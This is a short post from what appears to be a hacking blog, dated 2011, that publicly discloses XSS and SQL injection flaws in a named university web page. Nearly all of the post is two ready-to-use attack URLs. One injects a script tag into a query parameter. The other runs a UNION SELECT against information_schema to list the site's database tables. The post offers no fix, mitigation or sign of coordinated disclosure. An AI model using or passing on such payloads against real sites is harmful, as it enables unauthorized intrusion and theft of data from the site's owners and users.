english.stanford.edu XSS & Sql Injection-Vul ~ Zer0-0ne

Wednesday, January 19, 2011

english.stanford.edu XSS & Sql Injection-Vul

XSS:
http://english.stanford.edu/graduate.php?type=placement&order_by=year_appointed&order=%22/%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

SQLI:
http://english.stanford.edu/index.php?news_id=309%20union%20all%20select%201,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()--

Found by: darknessn1k0!a

Zer0-0ne

Wednesday, January 19, 2011

english.stanford.edu XSS & Sql Injection-Vul

0 comments:

Post a Comment

About Me

Blog Archive

Popular Posts

Categories

Featured Posts